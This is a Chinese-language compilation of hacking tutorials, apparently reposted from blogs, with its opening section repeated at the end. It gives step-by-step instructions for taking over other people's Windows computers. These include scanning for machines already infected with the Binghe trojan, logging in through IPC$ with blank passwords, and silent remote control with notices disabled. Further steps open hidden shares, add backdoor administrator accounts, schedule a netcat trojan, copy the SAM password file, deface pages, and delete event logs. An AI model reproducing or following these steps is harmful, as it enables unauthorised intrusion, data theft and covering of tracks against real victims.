2023年8月1日发(作者:)
X-Scan 3.3
采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式,扫描内容包括:远程操作系统类型及版本,标准端口状态及端口BANNER信息,CGI漏洞,IIS漏洞,RPC漏洞,SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户,NT服务器NETBIOS信息等。扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。对于一些已知漏洞,我们给出了相应的漏洞描述、利用程序及解决方案,其它漏洞资料正在进一步整理完善中,您也可以通过作者网站的"安全文献"和"漏洞引擎"栏目查阅相关说明。
知道IP后,进别人电脑(2007-04-05 20:47:22)转载
第一步
下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。
下载完毕并解压缩之后跟我进行第二步!
首先,假如我们已经取得202.99.1.1的Administrator的密码,通过IPCS打开Telnet服务并Telnet上202.99.1.1。执行ipconfig命令,得出其两块网卡的IP分别为192.168,0.1和202.99.1.1,那么其他的机器的IP应该就在192.168.0.X这个网段。在202.99.1.1上安装流光4.7的sensor(其实x-scan也可以,而且x-scan能够扫描的漏洞比流光多。不过操作起来就有点麻烦,你要先上传X-scan到主机,再telnet上去利用x-scan的命令行模式扫描,所以这个telnet终端不能断开,也就是说你要等到x—scan扫描完了才能断开telnet,否则就会中断扫描),主要是寻找内部网的漏洞。根据我的经验,内部网的机器的安全性极差!administrator的密码很弱智,多数为空或123、123456等!而且有许多分机的guest账号都是Administrators组的成员,总之就是漏洞重重!
分析内部网络的漏洞后,就利用“端口重定向”来入侵。
所谓端口转向功能,就是将对某个端口的请求转向到其他电脑上,假设某一分机的内部IP是192.168.0.2,经过流光的扫描知道Administrator的口令为123,并且开放Telnet和3389服务,主机的外部IP是202.99.1.1。在202.99.1.1上运行了一个端口转向的程序(Fpipe.exe),经过参数设置,这个程序先在202.99.1.1开,23端口并监听,当有请求连接时,创建一个socket,通过22端口把请求发送到192.168.0.2的23端口去.所以,当有人向主机202.99.1.1的23端口发送Telnet连接的请求时,端口转向程序就发生作用了,马上将这个请求转向到那台192.168.0.2分机上的23端口去,因为192.168.0.2开放Telnet服务,所以这台分机会马上作出回应,这样连接就会产生了,也就是说攻击者已经入侵到内网的分机。
如何入侵局域网电脑 (只供学习之用!)
1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;
2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。
入侵工具:
一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。)
入侵步骤:
1.使用"NTscan变态扫描器",在IP处填上要扫描的IP范围,选择"WMI扫描"方式,按"开始"后就等扫描结果了。
2.使用"Recton--D贺免杀专用版"
选择"CMD命令"项,在"CMD:"中输入"net share C$=C:",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"对方IPC$",即可进入对方C盘。
选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use
[url=file://***.***.***.***IPC$]***.***.***.***IPC$[/url] "" /user:administrator"在*处填入你入侵的主机IP。
3.使用"DameWare迷你中文版 4.5",安装后点"DameWare Mini
Remote Control",在"帮助"项中选择激活产品,输入注册信息,成功注册后,进入"远程连接"窗口,在"主机"处填入IP地址,点"设置",在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选,在"用户选项"中去掉"启用用户选项菜单"。设置完成好后,就可点"连接",在弹出的对话框中点"确定"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份。 入侵步骤补充:
1.在以上第2步中,远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。
--D贺免杀专用版还有其他功能,在"进程"项中,可以查看远程主机的进程,并可任意结束其中进程;在"共享"项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:,D:等,共享好后在地址栏中输入"[url=file://IPC$]IPC$[/url]",进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选"日志",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。
3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先"telnet
IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:winntsystem32",共享IPC$用:"net share IPC$"等,最后是关闭共享,关闭C盘共享:"net share C$ /del"。
4.为方便下次入侵,可以设置后门,查看用户:"net user",激活guest用户
"net user guest /active:yes",更改guest的密码为poco:"net user guest poco",把guest的权限提升为管理员权限:"net localgroup administrators guest
/add"。
命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:""dir d:",查看C盘program file文件夹:"dir c:PROGRA~1;",60秒倒记时关机:"shutdown -s -t 60"
补充说明:
use错误原因解决:
(1)."发生系统错误 1326。 登录失败:未知的用户名或错误密码。"
在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接,是无法访问C$等管理共享的.
(2)"发生系统错误 1327。登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".
(3)"//IP/c$"时提示找不到网络途径。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性,进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS
二什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$„„)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?
三 什么是空会话
在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:
1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建立;
2)服务器产生一个随机的64位数(实现挑战)传送回客户;
3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结
果返回到服务器(实现响应);
4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢? 空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢?
四 空会话可以做什么
对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。
从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的,成功的导出用户列表大大增加了猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令:
1 首先,我们先建立一个空连接(当然,这需要目标开放ipc$)
命令:net use [url=file://ipipc$]ipipc$[/url] "" /user:""
注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。
2 查看远程主机的共享资源
命令:net view [url=file://ip]ip[/url]
解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。
在 *.*.*.*的共享资源
资源共享名 类型 用途注释
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看远程主机的当前时间
命令: net time [url=file://ip]ip[/url]
解释:用此命令可以得到一个远程主机的当前时间。
4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)
命令:nbtstat -A ip
用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果:Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在Event Log中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?
五 ipc$所使用的端口
首先我们来了解一些基础知识:
1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。
有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:
对于win2000客户端(发起端)来说:
1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。
对于win2000服务器端来说:
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);
2 如果禁止NBT,那么只有445端口开放。
我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。
六 ipc管道在hack攻击中的意义
ipc管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放ipc管道的主机似乎更容易得手。通过ipc管道,我们可以远程调用一些系统函数(大多通过工具实现,但需要相应的权限),这往往是入侵成败的关键。如果不考虑这些,仅从传送文件这一方面,ipc管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然,我们也不能忽视权限在ipc管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限,那么ipc管道这把双刃剑将显示出它狰狞的一面。
七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因:
1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;
2 如果想成功的建立一个ipc$连接,就需要响应方开启ipc$共享,即使是空连接也是这样,如果响应方关闭了ipc$共享,将不能建立连接;
3 连接发起方未启动Lanmanworkstation服务(显示名为:Workstation):它提供网络链结和通讯,没有它发起方无法发起连接请求;
4 响应方未启动Lanmanserver服务(显示名为:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它主机将无法响应发起方的连接请求,不过没有它仍可发起ipc$连接;
5 响应方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份(不过这种情况好像不多);
6 响应方的139,445端口未处于监听状态或被防火墙屏蔽;
7 连接发起方未打开139,445端口;
8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于'无法更新密码'这样的错误提示(显然空会话排除这种错误);
9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;
10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
...............哈哈,你先删除原来的链接, net use
[url=file://ipipc$]ipipc$[/url] /del 删除IPC链接 ,然后在链接就好
第二步
运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。
第三步
在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。
第四步
进入“搜索因特网主机”界面后,“起始地址”栏填***.***.0.0其中***.***自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填***.***.255.255其中***.***的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从***.***.0.0到***.***.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。
第五步
观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II扫描网上开放某一端口的计算机了。
下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。
第六步
点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。
第七步
在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。
好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。
第八步
这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、D:。
第九步
点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵,祝贺你,你已经成功地进入对方的计算机了!!!!!
第十步
你发现没有出现对方计算机的硬盘分区!!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址:
1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃!
2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!!
第十一步
如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,先别忙放弃,重复3-4遍第八步到第九步的*作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。
第十二步
如果所有搜索到的IP地址按照第七步至第十一步*作后都不能进入对方计算机,呵呵,那是你的运气太差!别急,这样的运气是经常碰到的!再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!!呵呵,等吧!!搜索吧!!只要你有时间,你一定能成功!
第十三步 终于成功了!我见到对方计算机硬盘分区了!呵呵,怎么样?你成功了,我的任务就完成了。进入对方计算机后,所有的*作和自己计算机“文件管理器”里的*作一模一样!就没什么黑不到过来的了
如何进入别人的电脑- -
大学时在参加ACCP的电脑编程课程,只是兴趣而已,并没有多么的用心学,对一些乱七八糟的东西比较感兴趣,那时做的最多的就是尝试进入别人的电脑和服务器........
1、取得对方IP地址如,方法太多不细讲了。
2.判断对方上网的地点,开个DOS窗口键入 TRACERT 第4和第5行反映的信息既是对方的上网地点。
3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A
第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明
4.在Windows目录下有一文件名为,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件:
电脑名
5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入
黑客命令之1:NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为
127.0.0.1
net use 127.0.0.1ipc$ "123456" /user:"hbx"
退出的命令是
net use 127.0.0.1ipc$ /delte
下面的*作你必须登陆后才可以用.登陆的方法就在上面.
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用
户.
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators heibai /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这
里把对方的C盘映射到本地的Z盘.
net use z:127.0.0.1c$
----------------------
net start telnet
这样可以打开对方的TELNET服务.
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?
不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,
其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
黑客命令之2:at
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
你首先要得到对方的时间,
net time 127.0.0.1
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
at 127.0.0.1 12:3
这里假设了一个木马,名为,这个东西要在对方服务器上.
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它
是一个TELNET服务,端口为99.
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.
黑客命令之3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用
户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也
就是肉鸡.
黑客命令之4:FTP
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空
间,国内多的是,如果真的找不到,我给个,
不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器
在上传前需要登陆先,这里我们假设FTP服务器是 H, ttp://
用户名是HUCJS,密码是654321
ftp /
他会要求输入用户,成功后会要求输入密码.----------------------
下面先说上传,假设你需上传的文件是,它位于C:下,传到对方D:
get c: d:
假设你要把对方C盘下的,下到你的机子的D盘下
put c: d:
黑客命令之5:copy
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的复制到127.0.0.1的C盘下
copy 127.0.0.1c$ ----------------------
如果你要复制到D盘下把C改为D,就行了!
copy 127.0.0.1d$ ----------------------
如果你要把他复制到WINNT目录里
就要把输入
copy 127.0.0.1admin$
admin$是winnt ----------------------
要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在
x:winntrepairsam._ sam._是数据库的文件名
下面就把127.0.0.1的数据库复制到本地C盘下
copy 127.0.0.1admin$repairsam._ c:
黑客命令之7:nbtstat
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就
要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后
就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都
试下,不行就暴力破解吧!
现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分
析得到的结果。
命令是
nbtstat -A
-A一定要大写。
下面是得到的结果。
NetBIOS Remote Machine Name Table
Name 无效 Status
---------------------------------------------
Registered Registered Registered Registered Registered
Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是
不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用
户。
这里的用户是PENTIUMII。
黑客命令之8:Shutdown
关了对方的NT服务器的命令
Shutdown IP地址 t:20
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。
黑客命令之10:echo
著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主
机。
我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”
写入,有2种方法,大家看看有什么区别。
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>
第一个的意思是覆盖原有的内容,把“南京大屠杀铁证如
山,任何日本人不得抵赖!”写进。
第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”
加到里面。
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
大家可以本地试下。
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页
到对方的目录里。
1、首先,我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
open (你的FTP服务器,申请时你的空间提供商
会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get c:(这里是把你空间上
的下载到对方的c:)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
具体的做法:
输入 echo open > c:
输入 echo cnhack >> c:
输入 echo 39abs >> c:
输入 echo get
c:+>>+c:
最后输入 ftp -s:c: (利用ftp的-s参数,执行文件里的
内容。)
等命令完成时,文件已经下载到你指定的文件里了。
注意:取得文件后,请删除。(如果不删除,很容易会给
别人看到你的密码。)
记得要 del c:
黑客命令之11:attrib
这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件
属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不
行。倒!不过有这个命令就别怕了。
attrib -r
这个命令是把的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读 ----------------------
attrib +r
这个命令是把的属性设置为只读。
黑客命令之12:del
当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日
志,当然要删除日志啦!想被捉吗。呵呵。
NT的日志有这些
del C:winntsystem32logfiles*.*
del C:winntssytem32config*.evt
del C:winntsystem32dtclog*.*
del C:winntsystem32*.log
del C:winntsystem32*.txt
del C:winnt*.txt
del C:winnt*.log
只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改
成其他盘。
端口入侵工具
2023年8月1日发(作者:)
X-Scan 3.3
采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式,扫描内容包括:远程操作系统类型及版本,标准端口状态及端口BANNER信息,CGI漏洞,IIS漏洞,RPC漏洞,SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户,NT服务器NETBIOS信息等。扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。对于一些已知漏洞,我们给出了相应的漏洞描述、利用程序及解决方案,其它漏洞资料正在进一步整理完善中,您也可以通过作者网站的"安全文献"和"漏洞引擎"栏目查阅相关说明。
知道IP后,进别人电脑(2007-04-05 20:47:22)转载
第一步
下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。
下载完毕并解压缩之后跟我进行第二步!
首先,假如我们已经取得202.99.1.1的Administrator的密码,通过IPCS打开Telnet服务并Telnet上202.99.1.1。执行ipconfig命令,得出其两块网卡的IP分别为192.168,0.1和202.99.1.1,那么其他的机器的IP应该就在192.168.0.X这个网段。在202.99.1.1上安装流光4.7的sensor(其实x-scan也可以,而且x-scan能够扫描的漏洞比流光多。不过操作起来就有点麻烦,你要先上传X-scan到主机,再telnet上去利用x-scan的命令行模式扫描,所以这个telnet终端不能断开,也就是说你要等到x—scan扫描完了才能断开telnet,否则就会中断扫描),主要是寻找内部网的漏洞。根据我的经验,内部网的机器的安全性极差!administrator的密码很弱智,多数为空或123、123456等!而且有许多分机的guest账号都是Administrators组的成员,总之就是漏洞重重!
分析内部网络的漏洞后,就利用“端口重定向”来入侵。
所谓端口转向功能,就是将对某个端口的请求转向到其他电脑上,假设某一分机的内部IP是192.168.0.2,经过流光的扫描知道Administrator的口令为123,并且开放Telnet和3389服务,主机的外部IP是202.99.1.1。在202.99.1.1上运行了一个端口转向的程序(Fpipe.exe),经过参数设置,这个程序先在202.99.1.1开,23端口并监听,当有请求连接时,创建一个socket,通过22端口把请求发送到192.168.0.2的23端口去.所以,当有人向主机202.99.1.1的23端口发送Telnet连接的请求时,端口转向程序就发生作用了,马上将这个请求转向到那台192.168.0.2分机上的23端口去,因为192.168.0.2开放Telnet服务,所以这台分机会马上作出回应,这样连接就会产生了,也就是说攻击者已经入侵到内网的分机。
如何入侵局域网电脑 (只供学习之用!)
1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;
2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。
入侵工具:
一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。)
入侵步骤:
1.使用"NTscan变态扫描器",在IP处填上要扫描的IP范围,选择"WMI扫描"方式,按"开始"后就等扫描结果了。
2.使用"Recton--D贺免杀专用版"
选择"CMD命令"项,在"CMD:"中输入"net share C$=C:",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"对方IPC$",即可进入对方C盘。
选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use
[url=file://***.***.***.***IPC$]***.***.***.***IPC$[/url] "" /user:administrator"在*处填入你入侵的主机IP。
3.使用"DameWare迷你中文版 4.5",安装后点"DameWare Mini
Remote Control",在"帮助"项中选择激活产品,输入注册信息,成功注册后,进入"远程连接"窗口,在"主机"处填入IP地址,点"设置",在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选,在"用户选项"中去掉"启用用户选项菜单"。设置完成好后,就可点"连接",在弹出的对话框中点"确定"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份。 入侵步骤补充:
1.在以上第2步中,远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。
